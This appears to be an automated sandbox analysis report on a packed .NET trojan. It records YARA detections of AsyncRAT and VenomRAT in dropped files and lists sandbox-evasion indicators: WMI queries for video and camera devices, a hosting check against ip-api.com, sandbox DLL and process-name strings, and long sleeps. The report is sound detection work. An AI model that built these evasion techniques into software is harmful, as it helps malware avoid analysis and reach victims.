Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AsyncRAT

Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.Infected.exe.30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.Client.exe.350000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Infected.exe.28ed1c8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Client.exe.26a68b0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Infected.exe.28ed1c8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2032453597.00000000028ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2005734875.0000000002911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.2002428899.0000000000352000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2005734875.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.2003317795.0000000000032000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe PID: 6176, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Infected.exe PID: 3144, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Loaader.exe PID: 7392, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Client.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Loader.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Infected.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Loaader.exe, type: DROPPED

Yara detected VenomRAT

Source: Yara match	File source: 2.2.Client.exe.26a68b0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2034934534.00000000026A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Client.exe PID: 6152, type: MEMORYSTR

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\Loader.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005734875.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, Infected.exe, 00000003.00000002.2032453597.00000000028ED000.00000004.00000800.00020000.00000000.sdmp, Infected.exe, 00000003.00000000.2003317795.0000000000032000.00000002.00000001.01000000.00000007.sdmp, Infected.exe.0.dr, Loaader.exe.3.dr	Binary or memory string: SBIEDLL.DLLM{860BB310-5D01-11D0-BD3B-00A0C911CE86}
Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005734875.0000000002911000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005734875.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000002.00000002.2034934534.00000000026A3000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000002.00000000.2002428899.0000000000352000.00000002.00000001.01000000.00000006.sdmp, Infected.exe, 00000003.00000002.2032453597.00000000028ED000.00000004.00000800.00020000.00000000.sdmp, Infected.exe, 00000003.00000000.2003317795.0000000000032000.00000002.00000001.01000000.00000007.sdmp, Infected.exe.0.dr, Client.exe.0.dr, Loader.exe.2.dr, Loaader.exe.3.dr	Binary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Memory allocated: 27A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Memory allocated: 1A910000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Memory allocated: A90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Memory allocated: 1A5E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Memory allocated: 770000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Memory allocated: 1A300000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 1520000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 2ED0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 4ED0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 56E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 5520000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 66E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 76E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 7B30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 8B30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 9B30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Memory allocated: 11D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Memory allocated: 1AB80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Loader.exe	Memory allocated: 16A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Loader.exe	Memory allocated: 1B140000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Loader.exe	Memory allocated: F10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Loader.exe	Memory allocated: 1A8C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Memory allocated: 15F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Memory allocated: 1B070000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 14E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 2E70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 4E70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 5570000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 6570000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 66A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 76A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 79F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 89F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 1130000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 2C10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 4C10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 5350000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 6350000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 6480000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 7480000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 78D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 88D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Memory allocated: 98D0000 memory reserve \| memory write watch

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599797	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599524	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599360	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598937	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598826	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598704	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598556	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598433	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598323	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598218	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598090	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 597745	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 597320	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 597203	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 597094	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596948	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596844	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596718	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596604	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596270	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596141	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596015	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 595797	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 595684	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 595563	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 593075	Jump to behavior
